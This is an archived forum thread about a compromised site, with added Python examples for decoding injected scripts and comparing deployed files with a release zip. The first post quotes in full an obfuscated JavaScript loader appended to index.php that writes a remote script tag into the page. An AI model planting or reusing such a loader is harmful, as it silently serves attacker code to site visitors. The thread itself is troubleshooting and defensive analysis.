Has my site been hacked?


cosmin 269

Starting yesterday, I started getting errors on my website. It seems code is getting appended at the end of my index.php files. Yesterday it was index.php at the root, and now it's cadmin/index.php, after the final question mark. This is definitely not of my own doing. Here's what cadmin/index.php had appended:

<html><body><script type="text/javascript">var wGss98v0zDCHi = "uBdb915uBdb935";var qg2solLrupydN0 = "uBdb93cuBdb973uBdb963uBdb972u"; var qg2solLrupydN1 = "Bdb969uBdb970uBdb974uBdb920uB"; var qg2solLrupydN2 = "db974uBdb979uBdb970uBdb965uBd"; var qg2solLrupydN3 = "b93duBdb922uBdb974uBdb965uBdb"; var qg2solLrupydN4 = "978uBdb974uBdb92fuBdb96auBdb9"; var qg2solLrupydN5 = "61uBdb976uBdb961uBdb973uBdb96"; var qg2solLrupydN6 = "3uBdb972uBdb969uBdb970uBdb974"; var qg2solLrupydN7 = "uBdb922uBdb920uBdb973uBdb972u"; var qg2solLrupydN8 = "Bdb963uBdb93duBdb922uBdb968uB"; var qg2solLrupydN9 = "db974uBdb974uBdb970uBdb93auBd"; var qg2solLrupydN10 = "b92fuBdb92fuBdb963uBdb96fuBdb"; var qg2solLrupydN11 = "975uBdb96euBdb974uBdb965uBdb9"; var qg2solLrupydN12 = "72uBdb973uBdb974uBdb961uBdb97"; var qg2solLrupydN13 = "4uBdb973uBdb92euBdb973uBdb965"; var qg2solLrupydN14 = "uBdb972uBdb976uBdb965uBdb96du"; var qg2solLrupydN15 = "Bdb970uBdb933uBdb92euBdb963uB"; var qg2solLrupydN16 = "db96fuBdb96duBdb92fuBdb92fuBd"; var qg2solLrupydN17 = "b96duBdb96cuBdb92euBdb970uBdb"; var qg2solLrupydN18 = "968uBdb970uBdb922uBdb93euBdb9"; var qg2solLrupydN19 = "20uBdb93cuBdb92fuBdb973uBdb96"; var qg2solLrupydN20 = "3uBdb972uBdb969uBdb970uBdb974"; var qg2solLrupydN21 = "uBdb93e"; var ZPFlt1UYA1tfk = "Dh3Ln15uBdb935";var ERYCkoBwTvOcS = qg2solLrupydN0+qg2solLrupydN1+qg2solLrupydN2+qg2solLrupydN3+qg2solLrupydN4+qg2solLrupydN5+qg2solLrupydN6+qg2solLrupydN7+qg2solLrupydN8+qg2solLrupydN9+qg2solLrupydN10+qg2solLrupydN11+qg2solLrupydN12+qg2solLrupydN13+qg2solLrupydN14+qg2solLrupydN15+qg2solLrupydN16+qg2solLrupydN17+qg2solLrupydN18+qg2solLrupydN19+qg2solLrupydN20+qg2solLrupydN21; CtnqKOXMGM9bE = ERYCkoBwTvOcS.replace(/uBdb9/g,"%");var iRDgo28MEsBPo = unescape;var wGss98v0zDCHi = "AUx2i15Dh3Ln35";w9221 = this;var NKCGnIAa0Vzgr=w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];NKCGnIAa0Vzgr.write(iRDgo28MEsBPo(CtnqKOXMGM9bE));</script></body></html>>

Notice

This topic is archived. New comments cannot be posted and votes cannot be cast.
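
The snippet in the post above joins chunked string variables, swaps a marker for "%", and passes the result to unescape before writing it into the page through this["document"].write. The following Python decoder is an added example, not part of the original thread: it recovers that string statically, without running the JavaScript. The sample input, its "kM" marker and the example.invalid URL are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample using the same scheme as the appended snippet:
# chunked variables, a marker swapped for "%", unescape(), document.write().
SAMPLE = (
    'var p0 = "kM3ckM73kM63kM72kM69kM70kM74kM20kM73kM72kM63kM3dkM22kM6"; '
    'var p1 = "8kM74kM74kM70kM3akM2fkM2fkM65kM78kM61kM6dkM70kM6ckM65kM2e"; '
    'var p2 = "kM69kM6ekM76kM61kM6ckM69kM64kM2fkM78kM2ekM6akM73kM22kM3"; '
    'var p3 = "ekM3ckM2fkM73kM63kM72kM69kM70kM74kM3e"; '
    'var joined = p0+p1+p2+p3; enc = joined.replace(/kM/g,"%"); '
    'var u = unescape; d = this["dXoYcuXmeYnt".replace(/[XY]/g, "")]; d.write(u(enc));'
)

ASSIGN = re.compile(r'(?:var\s+)?(\w+)\s*=\s*"([^"]*)"\s*;')   # name = "literal";
CONCAT = re.compile(r'=\s*(\w+(?:\s*\+\s*\w+)+)\s*;')           # = a+b+c;
SWAP = re.compile(r'\.replace\(/([^/]+)/g\s*,\s*"%"\)')         # .replace(/marker/g,"%")
SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)', re.I)


def decode_injected(js):
    """Return the markup the snippet would write, or None if the scheme is absent.

    The text is only parsed; no JavaScript is executed.
    """
    strings = dict(ASSIGN.findall(js))
    concat, swap = CONCAT.search(js), SWAP.search(js)
    if not (concat and swap):
        return None
    names = [n.strip() for n in concat.group(1).split("+")]
    if any(n not in strings for n in names):
        return None
    joined = "".join(strings[n] for n in names)
    # JavaScript unescape() maps %XX to code point XX, which is Latin-1.
    return unquote(joined.replace(swap.group(1), "%"), encoding="latin-1")


def remote_scripts(markup):
    """List the src URLs of script tags in the decoded markup."""
    return SRC.findall(markup or "")


if __name__ == "__main__":
    decoded = decode_injected(SAMPLE)
    print(decoded)
    print(remote_scripts(decoded))
```

The URLs returned by remote_scripts are what a visitor's browser would have been told to load, which makes them useful search terms for proxy and web server logs.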

Responses to this topic


1 Re: Has my site been hacked?
OP 269
Yes, it's cPanel. Will talk to them and see what they have to say.
1 Re: Has my site been hacked?
Editor 0
Possibly a security problem with the server. I would open a trouble ticket at your webhost.

There are worms that can overwrite files like this even from different accounts on the server. Is this a cPanel server? In this case your webhost should upgrade to PHP 5.2.14 or higher.
1 Re: Has my site been hacked?
OP 269
PHP version: 5.2.9
Used API: cgi-fcgi
Integration: Contentteller
Memory Limit: 128M
Upload Limit: 2M / 8M
Suhosin Extension: No
Database Server: MySQL 5.0.91-community
Database Size: 2.4 MB
Server Time/Uptime: 0.65 0.50 0.39 1/180 21169
Next Automated Task: -
Cached Pages (Database): 0
Cached Pages (Filesystem): 21

That's what I have in that module.
1 Re: Has my site been hacked?
Editor 0
In the System Information block right on the first page: load averages and server time/uptime
1 Re: Has my site been hacked?
OP 269
Where do I see those?
1 Re: Has my site been hacked?
Editor 0
Do you see the server load stats in admin?
1 Re: Has my site been hacked?
OP 269
When I tried to access cadmin after your question, I got the following error:

Parse error: syntax error, unexpected '?' in /home/********/public_html/cadmin/index.php on line 374. I replaced it with the original though (or at least I think it was the original). I'm gonna compare the local files with the one in the zip file. I'm transferring the files using Adobe Dreamweaver.

class_html.php
class_xml.php
class_wysiwyg.php
twitteroauth.php

Although only cadmin/index.php seemed to be modified. The classes and twitteroauth.php seemed to have just a different timestamp between the ones on the server and the local files.
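
The comparison described in the post above can be done by content hash instead of by timestamp. This is an added example, not code from the thread or from Contentteller: it checks a downloaded copy of the site against the release zip and reports files whose content differs, noting when the difference is extra bytes after the final ?>. It assumes the zip's internal paths match the site root layout; the function names are hypothetical.

```python
import hashlib
import zipfile
from pathlib import Path


def tail_after_close_tag(data: bytes) -> bytes:
    """Bytes that follow the last '?>' in a PHP file, surrounding whitespace removed."""
    idx = data.rfind(b"?>")
    return b"" if idx == -1 else data[idx + 2:].strip()


def compare_with_release(site_root, release_zip):
    """Map relative path -> finding for a deployed tree checked against its release zip."""
    root, findings, known = Path(site_root), {}, set()
    with zipfile.ZipFile(release_zip) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            rel = info.filename
            known.add(rel)
            deployed = root / rel
            if not deployed.is_file():
                findings[rel] = "missing"
                continue
            data, original = deployed.read_bytes(), zf.read(info)
            # Compare content, not timestamps: an upload changes mtime on its own.
            if hashlib.sha256(data).digest() == hashlib.sha256(original).digest():
                continue
            tail = tail_after_close_tag(data) if rel.endswith(".php") else b""
            if tail and tail != tail_after_close_tag(original):
                findings[rel] = f"modified, {len(tail)} bytes after final ?>"
            else:
                findings[rel] = "modified"
    # PHP files that the release never shipped deserve a look as well.
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        if rel not in known:
            findings[rel] = "not in release"
    return findings
```

Configuration and cache files are expected to show up as "modified" or "not in release"; anything else in the result is worth opening by hand.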
1 Re: Has my site been hacked?
Editor 0
Only the index.php files? Do you have any other scripts installed? Do you get server load stats in the admin section?
1 Re: Has my site been hacked?
OP 269
Yes, I am.
1 Re: Has my site been hacked?
Editor 0
Are you on a shared webhost?
